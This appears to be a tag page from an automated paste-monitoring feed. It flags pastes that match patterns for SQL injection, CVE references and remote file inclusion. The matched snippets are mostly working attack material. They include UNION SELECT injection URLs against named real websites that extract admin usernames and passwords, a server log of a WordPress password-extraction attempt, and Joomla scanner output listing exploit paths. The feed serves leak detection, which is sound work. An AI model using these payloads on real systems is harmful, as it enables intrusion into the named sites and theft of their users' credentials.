Posts Tagged ‘SQL Injection’
Potential leak of data: SQL Injection
0 votedvote
Detected 1 occurrence(s) of ‘[a-zA-Z0-9\-_]=.*UNION\+SELECT’:
://www.rsadf.gov.sa/About_usT.asp?ID=29 http://www.rsadf.gov.sa/NewsT.asp?ID=498 http://www.rsadf.gov.sa/AsdT.asp?ID=42 http://www.semtech.com.tr/en/subpage.asp?id=34 http://www.isken.com.tr/en/page.asp?id=2&sayfa=1 http://www.amcham.org.lb/news.asp?id=14+union+select+1,2,username,4,5+from+admin http://www.aubmc.org.lb/users/subpage.asp?id=83 http://www.creditlibanais.com.lb/template.asp?id=409 http://www.creditlibanais.com.lb/template1.asp?id=48 http://aristo.mednetliban.com.lb/globemed/solutions.asp?ID=18 http:/
Potential leak of data: SQL Injection
0 votedvote
Detected 4 occurrence(s) of ‘[a-zA-Z0-9\-_]=.*UNION\+SELECT’:
############################################################################### # # # index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users/* # # #
Potential leak of data: CVE Reference
0 votedvote
Detected 1 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:
.php?id='684 http://oncampus.osu.edu/article.php?id='1113 http://pubs.its.ucdavis.edu/publication_detail.php?id='45 http://ppc.uiowa.edu/pages.php?id='31 http://www.design.cmu.edu/show_news.php?id='275 http://web.nvd.nist.gov/view/vuln/detail?vulnId='CVE-2010-2904 http://www.baylor.edu/copyright/index.php?id='63562 http://wdfw.wa.gov/publications/pub.php?id='00793 http://www.wrh.noaa.gov/forecasts/display_special_product_versions.php?sid='BOI&pil='AFD&version='10 http://www.senate.michigan.gov/dem/blog.
Detected 1 occurrence(s) of ‘[a-zA-Z0-9\-_]=.*UNION\+SELECT’:
ousemuseum.com/collection/database/?irn='29949 http://www.supervitaminhair.com/show.php?id='104 http://www.ezytrip.com/webboard/show.php?id='338 http://www.facebook.com/apps/application.php?id='19367456835 http://apps.facebook.com/tvshowchat/show.php?id='1+and+1='2+union+select+@@version--+1 http://www.cvenues.com/festival/show.php?id='2660 http://www.ibdb.com/show.php?ID='2087 http://www.gongwt.com/show.php?ID='99220 http://foshanwenyi.com/htm/cool/show.php?id='33 http://www.manufacturedhomesource.com/requestinfo/index.php
Potential leak of data: SQL Injection
0 votedvote
Detected 2 occurrence(s) of ‘[a-zA-Z0-9\-_]=.*UNION\+SELECT’:
.44 - - [18/Jun/2012:17:36:20 -0700] "GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 301 - "-" "Mozilla/4.0" 188.72.213.44 - - [18/Jun/2012:17:36:21 -0700] "GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 301 - "-" "Mozilla/4.0" 188.72.213.44 - - [18/Jun/2012:17:36:21 -0700] "GET /wp-trackback.php?p=1 HTTP/1.1" 404 135 "-" "Mozilla/4.0" 188.72.21
Potential leak of data: Remote File Inclusion
0 votedvote
Detected 2 occurrence(s) of ‘remote file inclusion’:
gin" and "file" parameters within jce.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources. Vulnerable? No sad # 37 Info -> Component: Dada Mail Manager Component Remote File Inclusion Vulnerability Version Affected: 2.6 <= Check: /administrator/components/ Exploit: /administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]= Vulnerable? No # 38 Info -> Component: Joomla com_quran SQL Injection
Detected 2 occurrence(s) of ‘[a-zA-Z0-9\-_]=.*UNION\+SELECT’:
xploit: /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path= Vulnerable? No # 24 Info -> CoreComponent: MailTo SQL Injection Vulnerability Versions effected: N/A Check: /components/com_mailto/ Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1 Vulnerable? No # 25 Info -> CoreComponent: com_content Blind SQL Injection Vulnerability Versions effected: Joomla! 1.5.0 RC3 Chec